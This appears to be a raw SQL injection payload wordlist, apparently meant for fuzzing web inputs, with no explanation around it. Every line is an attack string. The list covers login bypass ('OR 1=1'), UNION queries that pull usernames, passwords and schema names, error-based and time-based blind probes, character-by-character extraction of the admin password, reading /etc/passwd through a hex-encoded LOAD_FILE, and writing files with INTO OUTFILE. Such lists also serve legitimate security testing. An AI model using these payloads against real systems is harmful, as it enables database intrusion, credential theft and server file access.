'
''
`
``
,
"
""
/
//
\
\\
;
' OR '1'='1
' OR 1=1--
' OR 1=1#
' OR 1=1/*
') OR ('1'='1
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT username,password FROM users--
' UNION SELECT table_name FROM information_schema.tables--
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--
' AND EXTRACTVALUE(1, CONCAT(0x5c, (SELECT @@version)))--
' AND UPDATEXML(1, CONCAT(0x5c, (SELECT @@version)), 1)--
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
' AND (SELECT * FROM (SELECT(BENCHMARK(1000000,MD5(1))))a)--
' AND (SELECT COUNT(*) FROM information_schema.tables) > 0--
' AND (SELECT ASCII(SUBSTRING((SELECT @@version),1,1))) > 0--
' AND (SELECT ASCII(SUBSTRING((SELECT password FROM users LIMIT 0,1),1,1))) > 0--
' AND (SELECT LOAD_FILE(0x2f6574632f706173737764))--
' INTO OUTFILE '/tmp/test.txt'
' INTO DUMPFILE '/tmp/test.txt'
' AND (SELECT * FROM users WHERE username='admin' AND LENGTH(password)>0)--
' AND (SELECT * FROM users WHERE username='admin' AND ASCII(SUBSTRING(password,1,1))>0)--
' AND (SELECT * FROM users WHERE username='admin' AND ASCII(SUBSTRING(password,1,1))=97)--
' AND (SELECT * FROM users WHERE username='admin' AND SLEEP(5))--
' AND (SELECT * FROM users WHERE username='admin' AND BENCHMARK(1000000,MD5(1)))--
